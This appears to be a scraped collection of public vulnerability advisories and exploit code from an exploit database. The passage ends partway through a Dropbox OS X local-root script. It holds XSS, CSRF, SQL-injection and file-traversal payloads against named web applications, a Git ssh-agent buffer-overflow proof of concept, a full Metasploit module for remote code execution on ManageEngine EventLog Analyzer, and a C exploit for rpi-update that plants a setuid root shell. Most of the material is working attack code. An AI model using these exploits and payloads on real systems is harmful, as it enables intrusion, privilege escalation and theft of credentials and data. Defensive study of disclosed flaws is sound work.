HireHackking

source: https://www.securityfocus.com/bid/58076/info MDaemon WorldClient and WebAdmin are prone to a cross-site request-forgery vulnerability. Exploiting this issue may allow a remote attacker to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible. http://www.example.com/WorldClient.dll?Session=[SESSION_ID]&View=Options-Prefs&Reload=false&Save=Yes&ReturnJavaScript=Yes&ContentType=javascript&Password=Letme1n&ConfirmPassword=Letme1n http://www.example.com/WorldClient.dll?Session=[SESSION_ID]&View=Options-Prefs&Reload=false&Save=Yes&ReturnJavaScript=Yes&ContentType=javascript&ForwardingEnabled=Yes&ForwardingRetainCopy=Yes&ForwardingAddress=hacker%40example.com

source: https://www.securityfocus.com/bid/58078/info Zenphoto is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Zenphoto 1.4.4.1 is vulnerable; other versions may also be affected. http://www.example.com/index.php?rss=undefined+and+1%3D0&lang=en[Blind SQL Injection]

source: https://www.securityfocus.com/bid/58085/info OpenEMR is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. OpenEMR 4.1.1 is vulnerable; other versions may also be affected. http://www.example.com/openemr/[DIR]/[SCRIPT]?site="><script>alert(1);</script>

source: https://www.securityfocus.com/bid/58116/info ZeroClipboard is prone to a cross-site scripting vulnerability. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. ZeroClipboard versions prior to 1.1.7 are vulnerable. http://www.example.com/themes/default/htdocs/flash/ZeroClipboard.swf?id=\";))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height http://www.example.com/piwigo/extensions/UserCollections/template/ZeroClipboard.swf?id=\";))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height http://www.example.com/filemanager/views/js/ZeroClipboard.swf?id=\";))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height http://www.example.com/path/dataTables/extras/TableTools/media/swf/ZeroClipboard.swf?id=\";))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height http://www.example.com/script/jqueryplugins/dataTables/extras/TableTools/media/swf/ZeroClipboard.swf?id=\";))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height http://www.example.com/www.example.coms/all/modules/ogdi_field/plugins/dataTables/extras/TableTools/media/swf/ZeroClipboard.swf?id=\";))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

source: https://www.securityfocus.com/bid/58081/info PHPmyGallery is prone to multiple cross-site scripting vulnerabilities and a local file-disclosure vulnerability because it fails to sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, and obtain sensitive information from local files on computers running the vulnerable application. This may aid in further attacks PHPmyGallery 1.51.010 and prior versions are vulnerable. http://www.www.example.com/_conf/?action=statistics&filename=2011.10"><script>alert(document.cookie)</script>><marquee><h1>TheMirkin</h1></marquee> http://www.www.example.com/_conf/?action=delsettings&group="><script>alert(document.cookie)</script>><marquee><h1>TheMirkin</h1></marquee> http://www.example.com/_conf/?action=delsettings&group=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.jpg&picdir=Sample_Gallery&what=descriptions

source: https://www.securityfocus.com/bid/58131/info Photodex ProShow Producer is prone to multiple arbitrary code-execution vulnerabilities. An attacker can exploit these issues by enticing a legitimate user to use the vulnerable application to open a customized library file from application path which contains a specially crafted code. Successful exploits will compromise the application in the context of the currently logged-in user. Photodex ProShow Producer 5.0.3297 is vulnerable; other versions may also be affected. // wine gcc -Wall -shared inject.c -o ddraw.dll #include <windows.h> BOOL WINAPI DllMain(HINSTANCE hInstDLL, DWORD dwReason, LPVOID lpvReserved) { if (dwReason == DLL_PROCESS_ATTACH) { MessageBox(0,"DLL Injection","DLL Injection", 0); } return TRUE; }

source: https://www.securityfocus.com/bid/58135/info The Smart Flv plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. https://www.example.com/wp-content/plugins/smart-flv/jwplayer.swf?file=1.mp4&link=javascript:alert%28%22horse%22%29&linktarget=_self&displayclick=link https://www.example.com/wp-content/plugins/smart-flv/jwplayer.swf?playerready=alert%28%22horse%22%29

source: https://www.securityfocus.com/bid/58160/info phpMyRecipes is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input. Attacker-supplied HTML and script code could be executed in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks may also be possible. phpMyRecipes 1.2.2 is vulnerable; other versions may also be affected. POST /recipes/addrecipe.php HTTP/1.1 Host: localhost Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Content-Type: application/x-www-form-urlencoded r_name="><script>alert(0)</script>&r_category=13&r_servings=1&r_difficulty=1&i_qty=&i_unit=4&i_item=0&i_item_text=&r_instructions="><script>alert(0)</script>

source: https://www.securityfocus.com/bid/58164/info JForum is prone to multiple cross-site scripting vulnerabilities because it fails to sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. JForum 2.1.9 is vulnerable; other versions may also be affected. GET/jforum/jforum.page?module=posts&start=0&forum_id=1&quick=1&disable_html=1&action=insertSave4a9d0%22%3e%3cscript%3ealert%281%29%3c%2fscript%3e5d668e3a93160a27e&topic_id=2 HTTP/1.1

source: https://www.securityfocus.com/bid/58151/info Batavi is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. Batavi 1.2.2 is vulnerable; other versions may also be affected. <root>/admin/index.php?file_manager&file_manager&"><script>alert(123)</script></a><a href="

source: https://www.securityfocus.com/bid/58209/info Geeklog is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. Geeklog 1.8.2 is vulnerable; other versions may also be affected. <form action="http://www.example.com/submit.php?type=calendar" method="post"> <input type="hidden" name="mode" value="Submit"> <input type="hidden" name="calendar_type" value=&#039;"><script>alert(document.cookie);</script>&#039;> <input type="submit" id="btn"> </form>

''' [+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-GIT-SSH-AGENT-BUFF-OVERFLOW.txt Vendor: ================================ git-scm.com Product: ================================ Git-1.9.5-preview20150319.exe github.com/msysgit/msysgit/releases/tag/Git-1.9.5-preview20150319 Vulnerability Type: =================== Buffer Overflow CVE Reference: ============== N/A Vulnerability Details: ========================= Git Windows SVN ssh-agent.exe is vulnerable to buffer overflow. Under cmd dir in Git there is start-ssh-agent.cmd file used to invoke ssh-agent.exe. This is local attack vector in which if the "start-ssh-agent.cmd" file is replaced with specially crafted malicious '.cmd' file we cause buffer overflow, code execution may become possible. Fault module seems to be msys-1.0.dll File Name: msys-1.0.dll MD5: 39E779952FF35D1EB3F74B9C36739092 APIVersion: 0.46 Stack trace: ------------- MSYS-1.0.12 Build:2012-07-05 14:56 Exception: STATUS_ACCESS_VIOLATION at eip=41414141 eax=FFFFFFFF ebx=0028FA3C ecx=680A4C3A edx=680A4C3A esi=0028FA2C edi=00001DAC ebp=42424242 esp=0028F9B4 program=C:\Program Files (x86)\Git\bin\ssh-agent.exe cs=0023 ds=002B es=002B fs=0053 gs=002B ss=002B Payload of 944 bytes to cause seg fault: @ 948 bytes we completely overwrite EBP register. @ 972 bytes KABOOOOOOOOOOM! we control EIP. Quick GDB dump... Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? () (gdb) info r eax 0xffffffff -1 ecx 0x680a4c3a 1745505338 edx 0x680a4c3a 1745505338 ebx 0x28f90c 2685196 esp 0x28f884 0x28f884 ebp 0x41414141 0x41414141 esi 0x28f8fc 2685180 edi 0x2660 9824 eip 0x41414141 0x41414141 eflags 0x10246 [ PF ZF IF RF ] cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x53 83 gs 0x2b 43 POC code(s): =============== Python script below to create a malicious 'start-ssh-agent.cmd' file that will be renamed to 'ssh_agent_hell.cmd' and moved to the Git/bin directory, once run will cause buffer overflow and overwrite EIP. Save following as ssh-agent-eip.py or whatever, run the script to generate a new malicious '.cmd' file and run it! ''' import struct,os,shutil #Git ssh-agent.exe #EIP overwrite at 972 bytes #By hyp3rlinx #====================================================== file="C:\\Program Files (x86)\\Git\\bin\\ssh_agent_hell" payload="CALL ssh-agent.exe " x=open(file,"w") eip="A"*4 payload+="B"*968+eip x.write(payload) x.close() src="C:\\Program Files (x86)\\Git\\bin\\" shutil.move(file,file+".cmd") print "Git ssh-agent.exe buffer overflow POC\n" print "ssh_agent_hell.cmd file created!...\n" print "by hyp3rlinx" print "====================================\n" ''' Disclosure Timeline: ========================================================= Vendor Notification: August 10, 2015 Sept 26, 2015 : Public Disclosure Exploitation Technique: ======================= Local Description: ========================================================== Vulnerable Product: [+] Git-1.9.5-preview20150319.exe =========================================================== [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx '''

source: https://www.securityfocus.com/bid/58271/info Plogger is prone to following input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data: 1. An SQL-injection vulnerability 2. Multiple cross-site scripting vulnerabilities 3. A cross-site request forgery vulnerability An attacker can exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in context of the affected site, steal cookie-based authentication credentials, access or modify data, exploit latent vulnerabilities in the underlying database, and perform certain unauthorized actions; other attacks are also possible. Plogger 1.0 Rc1 is vulnerable; other versions may also be affected. +---+[ Feedback.php Sqli ]+---+ Injectable On entries_per_pag Parameter In Feedback.php http://www.example.com/plogger/plog-admin/plog-feedback.php?entries_per_page=5' p0c if (isset($_REQUEST['entries_per_page'])) { $_SESSION['entries_per_page'] = $_REQUEST['entries_per_page']; } else if (!isset($_SESSION['entries_per_page'])) { $_SESSION['entries_per_page'] = 20; } . . . $limit = "LIMIT ".$first_item.", ".$_SESSION['entries_per_page']; . . // Generate javascript init function for ajax editing $query = "SELECT *, UNIX_TIMESTAMP(`date`) AS `date` from ".PLOGGER_TABLE_PREFIX."comments WHERE `approved` = ".$approved." ORDER BY `id` DESC ".$limit; $result = run_query($query); +---+[ CSRF In Admin Panel ]+---+ Plogger is Not using any parameter or security Token to Protect Against CSRF , So its Vuln To CSRF on ALl Locations Inside Admin Panel.. +---+[ XSS ]+---+ Their Are Multiple XSS in Plogger.Like Editing Comment inside Admin Panel.They Are Filtering The Comments For Normal User But Not For Admin. And AS it is CSRF All Where SO We Can Edit AN Comment VIA CSRF and Change it With Any XSS Vector.. XSS http://www.example.com/plogger/plog-admin/plog-feedback.php Edit Comment With ANy XSS Vector OR JUSt do it VIA CSRF. Uploading the File and enter name to any XSS Vector.. http://www.example.com/plogger/plog-admin/plog-upload.php It Can Me Exploit IN Many Ways LIke CSRF + SQLI inside Admin panel..which Is define above. XSS In Edit Comment.CSRF + XSS <html> <head> <form class="edit width-700" action="www.example.com/plogger/plog-admin/plog-feedback.php" method="post"> <div style="float: right;"><img src="http://www.example.com/plogger/plog-content/thumbs/plogger-test-collection/plogger-test-album/small/123.png" alt="" /></div> <div> <div class="strong">Edit Comment</div> <p> <label class="strong" accesskey="a" for="author">Author:</label><br /> <input size="65" name="author" id="author" value="<script>alert('Hi');</script>" type="hidden"/> </p> <p> <label class="strong" accesskey="e" for="email">Email:</label><br /> <input size="65" name="email" id="email" value="asdf@www.example.com.com" type="hidden"/> </p> <p> <label class="strong" accesskey="u" for="url">Website:</label><br /> <input size="65" name="url" id="url" value="http://adsf.com" type="hidden"/> </p> <p> <label class="strong" accesskey="c" for="comment">Comment:</label><br /> <textarea cols="62" rows="4" name="comment" id="comment"><script>alert('Hi');</script>&lt;/textarea&gt; </p> <input type="hidden" name="pid" value="4" /> <input type="hidden" name="action" value="update-comment" /> <input class="submit" name="update" value="Update" type="submit" /> <input class="submit-cancel" name="cancel" value="Cancel" type="submit" /> </div> </form> Another XSS http://www.example.com/plogger/plog-admin/plog-manage.php?action=edit-picture&id=1 Edit Caption To XSS Vector Inside Admin PAnel.. Again CSRF + XSS <form class="edit width-700" action="www.example.com/plogger/plog-admin/plog-manage.php?level=pictures&id=1" method="post"> <div style="float: right;"><img src="http://www.example.com/plogger/plog-content/thumbs/plogger-test-collection/plogger-test-album/small/123.png" alt="" /></div> <div> <div class="strong">Edit Image Properties</div> <p> <label class="strong" accesskey="c" for="caption"><em>C</em>aption:</label><br /> <input size="62" name="caption" id="caption" value="<script>alert(document.cookie);</script>" type="hidden"/> </p> <p> <label class="strong" for="description">Description:</label><br /> <textarea name="description" id="description" cols="60" rows="5"><script>alert(document.cookie);</script>&lt;/textarea&gt; </p> <p><input type="checkbox" id="allow_comments" name="allow_comments" value="1" checked="checked" /><label class="strong" for="allow_comments" accesskey="w">Allo<em>w</em> Comments?</label></p> <input type="hidden" name="pid" value="1" /> <input type="hidden" name="action" value="update-picture" /> <input class="submit" name="update" value="Update" type="submit" /> <input class="submit-cancel" name="cancel" value="Cancel" type="submit" /> </div> </form> CSRF Admin Password Reset And XSS plog-options.php <form action="http://www.example.com/plogger/plog-admin/plog-options.php" method="post"> <table class="option-table" cellspacing="0"> <tbody><tr class="alt"> <td class="left"><label for="admin_username"></label></td> <td class="right"><input size="40" id="admin_username" name="admin_username" value="admin" type="hidden"></td> </tr> <tr> <td class="left"><label for="admin_email"></label></td> <td class="right"><input size="40" id="admin_email" name="admin_email" value="www.example.com@hotmail.com" type="hidden"></td> </tr> <tr class="alt"> <td class="left"><label for="admin_password"></label></td> <td class="right"><input size="40" id="admin_password" name="admin_password" value="123456789" type="hidden"></td> <tr> <td class="left"><label for="confirm_admin_password"></label></td> <td class="right"><input size="40" id="confirm_admin_password" name="confirm_admin_password" value="123456789" type="hidden"></td> </tr> <td class="left"><label for="gallery_url"></label></td> <td class="right"><input size="40" type="text" id="gallery_url" name="gallery_url" value="<script>alert('hi');</script>" type="hidden"/></td></tr> </tbody></table> <td class="right"><input class="submit" name="submit" value="DOne" type="submit"></td>

Source: http://www.halfdog.net/Security/2015/ApportKernelCrashdumpFileAccessVulnerabilities/ Problem description: On Ubuntu Vivid Linux distribution apport is used for automated sending of client program crash dumps but also of kernel crash dumps. For kernel crashes, upstart or SysV init invokes the program /usr/share/apport/kernel_crashdump at boot to prepare crash dump files for sending. This action is performed with root privileges. As the crash dump directory /var/crash/ is world writable and kernel_crashdump performs file access in unsafe manner, any local user may trigger a denial of service or escalate to root privileges. If symlink and hardlink protection is enabled (which should be the default for any modern system), only denial of service is possible. Problematic syscall in kernel_crashdump is: open("/var/crash/linux-image-3.19.0-18-generic.0.crash", O_WRONLY|O_CREAT|O_TRUNC|O_LARGEFILE|O_CLOEXEC, 0666) = 30 ... open("/var/crash/vmcore.log", O_RDONLY|O_LARGEFILE|O_CLOEXEC) = 31 Thus the output file is opened unconditionally and without O_EXCL or O_NOFOLLOW. Also opening of input file does not care about links. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38353.zip

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper include Msf::Exploit::Powershell def initialize(info={}) super(update_info(info, 'Name' => 'ManageEngine EventLog Analyzer Remote Code Execution', 'Description' => %q{ This module exploits a SQL query functionality in ManageEngine EventLog Analyzer v10.6 build 10060 and previous versions. Every authenticated user, including the default "guest" account can execute SQL queries directly on the underlying Postgres database server. The queries are executed as the "postgres" user which has full privileges and thus is able to write files to disk. This way a JSP payload can be uploaded and executed with SYSTEM privileges on the web server. This module has been tested successfully on ManageEngine EventLog Analyzer 10.0 (build 10003) over Windows 7 SP1. }, 'License' => MSF_LICENSE, 'Author' => [ 'xistence <xistence[at]0x90.nl>' # Discovery, Metasploit module ], 'References' => [ ['EDB', '38173'] ], 'Platform' => ['win'], 'Arch' => ARCH_X86, 'Targets' => [ ['ManageEngine EventLog Analyzer 10.0 (build 10003) / Windows 7 SP1', {}] ], 'Privileged' => true, 'DisclosureDate' => 'Jul 11 2015', 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(8400), OptString.new('USERNAME', [ true, 'The username to authenticate as', 'guest' ]), OptString.new('PASSWORD', [ true, 'The password to authenticate as', 'guest' ]) ], self.class) end def uri target_uri.path end def check # Check version vprint_status("#{peer} - Trying to detect ManageEngine EventLog Analyzer") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, 'event', 'index3.do') }) if res && res.code == 200 && res.body && res.body.include?('ManageEngine EventLog Analyzer') return Exploit::CheckCode::Detected else return Exploit::CheckCode::Safe end end def sql_query(cookies, query) res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, 'event', 'runQuery.do'), 'cookie' => cookies, 'vars_post' => { 'execute' => 'true', 'query' => query, } }) unless res && res.code == 200 fail_with(Failure::Unknown, "#{peer} - Failed executing SQL query!") end res end def generate_jsp_payload(cmd) decoder = rand_text_alpha(4 + rand(32 - 4)) decoded_bytes = rand_text_alpha(4 + rand(32 - 4)) cmd_array = rand_text_alpha(4 + rand(32 - 4)) jsp_code = '<%' jsp_code << "sun.misc.BASE64Decoder #{decoder} = new sun.misc.BASE64Decoder();\n" jsp_code << "byte[] #{decoded_bytes} = #{decoder}.decodeBuffer(\"#{Rex::Text.encode_base64(cmd)}\");\n" jsp_code << "String [] #{cmd_array} = new String[3];\n" jsp_code << "#{cmd_array}[0] = \"cmd.exe\";\n" jsp_code << "#{cmd_array}[1] = \"/c\";\n" jsp_code << "#{cmd_array}[2] = new String(#{decoded_bytes}, \"UTF-8\");\n" jsp_code << "Runtime.getRuntime().exec(#{cmd_array});\n" jsp_code << '%>' jsp_code end def exploit print_status("#{peer} - Retrieving JSESSION ID") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, 'event', 'index3.do'), }) if res && res.code == 200 && res.get_cookies =~ /JSESSIONID=(\w+);/ jsessionid = $1 print_status("#{peer} - JSESSION ID Retrieved [ #{jsessionid} ]") else fail_with(Failure::Unknown, "#{peer} - Unable to retrieve JSESSION ID!") end print_status("#{peer} - Access login page") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, 'event', "j_security_check;jsessionid=#{jsessionid}"), 'vars_post' => { 'forChecking' => 'null', 'j_username' => datastore['USERNAME'], 'j_password' => datastore['PASSWORD'], 'domains' => "Local Authentication\r\n", 'loginButton' => 'Login', 'optionValue' => 'hide' } }) if res && res.code == 302 redirect = URI(res.headers['Location']) print_status("#{peer} - Location is [ #{redirect} ]") else fail_with(Failure::Unknown, "#{peer} - Access to login page failed!") end # Follow redirection process print_status("#{peer} - Following redirection") res = send_request_cgi({ 'uri' => "#{redirect}", 'method' => 'GET' }) if res && res.code == 200 && res.get_cookies =~ /JSESSIONID/ cookies = res.get_cookies print_status("#{peer} - Logged in, new cookies retrieved [#{cookies}]") else fail_with(Failure::Unknown, "#{peer} - Redirect failed, unable to login with provided credentials!") end jsp_name = rand_text_alphanumeric(4 + rand(32 - 4)) + '.jsp' cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first) jsp_payload = Rex::Text.encode_base64(generate_jsp_payload(cmd)).gsub(/\n/, '') print_status("#{peer} - Executing SQL queries") # Remove large object in database, just in case it exists from previous exploit attempts sql = 'SELECT lo_unlink(-1)' result = sql_query(cookies, sql) # Create large object "-1". We use "-1" so we will not accidently overwrite large objects in use by other tasks. sql = 'SELECT lo_create(-1)' result = sql_query(cookies, sql) if result.body =~ /menuItemRow\">([0-9]+)/ loid = $1 else fail_with(Failure::Unknown, "#{peer} - Postgres Large Object ID not found!") end select_random = rand_text_numeric(2 + rand(6 - 2)) # Insert JSP payload into the pg_largeobject table. We have to use "SELECT" first to to bypass OpManager's checks for queries starting with INSERT/UPDATE/DELETE, etc. sql = "SELECT #{select_random};INSERT INTO/**/pg_largeobject/**/(loid,pageno,data)/**/VALUES(#{loid}, 0, DECODE('#{jsp_payload}', 'base64'));--" result = sql_query(cookies, sql) # Export our large object id data into a WAR file sql = "SELECT lo_export(#{loid}, '..//..//webapps//event/#{jsp_name}');" sql_query(cookies, sql) # Remove our large object in the database sql = 'SELECT lo_unlink(-1)' result = sql_query(cookies, sql) register_file_for_cleanup("..\\webapps\\event\\#{jsp_name}") print_status("#{peer} - Executing JSP payload") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, jsp_name), }) # If the server returns 200 we assume we uploaded and executed the payload file successfully unless res && res.code == 200 print_status("#{res.code}\n#{res.body}") fail_with(Failure::Unknown, "#{peer} - Payload not executed, aborting!") end end end

source: https://www.securityfocus.com/bid/58285/info The Uploader Plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. Uploader 1.0.4 is vulnerable; other versions may also be affected. http://www.example.com/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3Cscript%3Ealert%28123%29;%3C/script%3E

source: https://www.securityfocus.com/bid/58290/info Foscam is prone to a directory-traversal vulnerability. Remote attackers can use specially crafted requests with directory-traversal sequences ('../') to retrieve arbitrary files in the context of the application. This may aid in further attacks. GET //../proc/kcore HTTP/1.0

source: https://www.securityfocus.com/bid/58293/info HP Intelligent Management Center is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. HP Intelligent Management Center 5.1 E0202 is vulnerable; other versions may also be affected. http://www.example.com/imc/topo/topoContent.jsf?opentopo_symbolid="><img src="http://security.inshell.net/img/logo.png" onload=alert('XSS');>&opentopo_loader=null&opentopo_level1nodeid=3 &topoorientation_parentsymbolid=null&topoorientation_devsymbolid=null&topoorientation_level1nodeid=null &topoorientation_loader=null&checknode=null&ywkeys=isvlan&ywvalues=1&uselefttree=null&usetabpane=null&HandleMode=null&toponamelist=null

// source: https://www.securityfocus.com/bid/58292/info rpi-update is prone to an insecure temporary file-handling vulnerability and a security-bypass vulnerability An attacker can exploit this issue to perform symbolic-link attacks, overwriting arbitrary files in the context of the affected application, bypass certain security restrictions, and perform unauthorized actions. This may aid in further attacks. /*Local root exploit for rpi-update on raspberry Pi. Vulnerability discovered by Technion, technion@lolware.net https://github.com/Hexxeh/rpi-update/ larry@pih0le:~$ ./rpix updateScript.sh [*] Launching attack against "updateScript.sh" [+] Creating evil script (/tmp/evil) [+] Creating target file (/usr/bin/touch /tmp/updateScript.sh) [+] Initialize inotify on /tmp/updateScript.sh [+] Waiting for root to change perms on "updateScript.sh" [+] Opening root shell (/tmp/sh) # <-- Yay! Larry W. Cashdollar http://vapid.dhs.org @_larry0 Greets to Vladz. */ #include <stdlib.h> #include <stdio.h> #include <unistd.h> #include <sys/stat.h> #include <sys/types.h> #include <string.h> #include <sys/inotify.h> #include <fcntl.h> #include <sys/syscall.h> /*Create a small c program to pop us a root shell*/ int create_nasty_shell(char *file) { char *s = "#!/bin/bash\n" "echo 'main(){setuid(0);execve(\"/bin/sh\",0,0);}'>/tmp/sh.c\n" "cc /tmp/sh.c -o /tmp/sh; chown root:root /tmp/sh\n" "chmod 4755 /tmp/sh;\n"; int fd = open(file, O_CREAT|O_RDWR, S_IRWXU|S_IRWXG|S_IRWXO); write(fd, s, strlen(s)); close(fd); return 0; } int main(int argc, char **argv) { int fd, wd; char buf[1], *targetpath, *cmd, *evilsh = "/tmp/evil", *trash = "/tmp/trash"; if (argc < 2) { printf("Usage: %s <target file> \n", argv[0]); return 1; } printf("[*] Launching attack against \"%s\"\n", argv[1]); printf("[+] Creating evil script (/tmp/evil)\n"); create_nasty_shell(evilsh); targetpath = malloc(sizeof(argv[1]) + 32); cmd = malloc(sizeof(char) * 32); sprintf(targetpath, "/tmp/%s", argv[1]); sprintf(cmd,"/usr/bin/touch %s",targetpath); printf("[+] Creating target file (%s)\n",cmd); system(cmd); printf("[+] Initialize inotify on %s\n",targetpath); fd = inotify_init(); wd = inotify_add_watch(fd, targetpath, IN_MODIFY); printf("[+] Waiting for root to modify :\"%s\"\n", argv[1]); syscall(SYS_read, fd, buf, 1); syscall(SYS_rename, targetpath, trash); syscall(SYS_rename, evilsh, targetpath); inotify_rm_watch(fd, wd); printf("[+] Opening root shell (/tmp/sh)\n"); sleep(2); system("rm -fr /tmp/trash;/tmp/sh || echo \"[-] Failed.\""); return 0; }

source: https://www.securityfocus.com/bid/58307/info The Count Per Day plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An authenticated attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. Count Per Day 3.2.5 and prior versions are vulnerable. http://www.example.com/wordpress/wp-admin/?page=cpd_metaboxes HTTP/1.1... /daytoshow=2013-03-04%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&showday=Show

#!/bin/bash # Exploit Title: Dropbox FinderLoadBundle OS X local root exploit # Google Dork: N/A # Date: 29/09/15 # Exploit Author: cenobyte # Vendor Homepage: https://www.dropbox.com # Software Link: N/A # Version: Dropbox 1.5.6, 1.6-7.*, 2.1-11.*, 3.0.*, 3.1.*, 3.3.* # Tested on: OS X Yosemite (10.10.5) # CVE: N/A # # Dropbox FinderLoadBundle OS X local root exploit by cenobyte 2015 # <vincitamorpatriae@gmail.com> # # - vulnerability description: # The setuid root FinderLoadBundle that was included in older DropboxHelperTools # versions for OS X allows loading of dynamically linked shared libraries # that are residing in the same directory. The directory in which # FinderLoadBundle is located is owned by root and that prevents placing # arbitrary files there. But creating a hard link from FinderLoadBundle to # somewhere in a directory in /tmp circumvents that protection thus making it # possible to load a shared library containing a payload which creates a root # shell. # # - vulnerable versions: | versions not vulnerable: # Dropbox 3.3.* for Mac | Dropbox 3.10.* for Mac # Dropbox 3.1.* for Mac | Dropbox 3.9.* for Mac # Dropbox 3.0.* for Mac | Dropbox 3.8.* for Mac # Dropbox 2.11.* for Mac | Dropbox 3.7.* for Mac # Dropbox 2.10.* for Mac | Dropbox 3.6.* for Mac # Dropbox 2.9.* for Mac | Dropbox 3.5.* for Mac # Dropbox 2.8.* for Mac | Dropbox 3.4.* for Mac # Dropbox 2.7.* for Mac | Dropbox 3.2.* for Mac # Dropbox 2.6.* for Mac | Dropbox 1.5.1-5 for Mac # Dropbox 2.5.* for Mac | Dropbox 1.4.* for Mac # Dropbox 2.4.* for Mac | Dropbox 1.3.* for Mac # Dropbox 2.3.* for Mac | # Dropbox 2.2.* for Mac | # Dropbox 2.1.* for Mac | # Dropbox 1.7.* for Mac | # Dropbox 1.6.* for Mac | # Dropbox 1.5.6 for Mac | # # The vulnerability was fixed in newer DropboxHelperTools versions as of 3.4.*. # However, there is no mention of this issue at the Dropbox release notes: # https://www.dropbox.com/release_notes # # It seems that one of the fixes implemented in FinderLoadBundle is a # check whether the path of the bundle is a root owned directory making it # impossible to load arbitrary shared libraries as a non-privileged user. # # I am not sure how to find the exact version of the FinderLoadBundle executable # but the included Info.plist contained the following key: # <key>CFBundleShortVersionString</key> # This key is no longer present in the plist file of the latest version. So I # included a basic vulnerable version checker that checks for the presence of # this key. # # - exploit details: # I wrote this on OS X Yosemite (10.10.5) but there are no OS specific features # used. This exploit relies on Xcode for the shared library + root shell to be # compiled. After successful exploitation a root shell is left in a directory in # /tmp so make sure you delete it on your own system when you are done testing. # # - example: # $ ./dropboxfinderloadbundle.sh # Dropbox FinderLoadBundle OS X local root exploit by cenobyte 2015 # # [-] creating temporary directory: /tmp/c7a15893fc1b28d31071c16c6663cbf3 # [-] linking /Library/DropboxHelperTools/Dropbox_u501/FinderLoadBundle # [-] constructing bundle # [-] creating /tmp/c7a15893fc1b28d31071c16c6663cbf3/boomsh.c # [-] compiling root shell # [-] executing FinderLoadBundle using root shell payload # [-] entering root shell # bash-3.2# id -P # root:********:0:0::0:0:System Administrator:/var/root:/bin/sh readonly __progname=$(basename $0) errx() { echo "$__progname: $@" >&2 exit 1 } main() { local -r tmp=$(head -10 /dev/urandom | md5) local -r helpertools="/Library/DropboxHelperTools" local -r bundle="/tmp/$tmp/mach_inject_bundle_stub.bundle/Contents/MacOS" local -r bundletarget="$bundle/mach_inject_bundle_stub" local -r bundlesrc="${bundletarget}.c" local -r sh="/tmp/$tmp/boomsh" local -r shsrc="${sh}.c" local -r cfversion="CFBundleShortVersionString" local -r 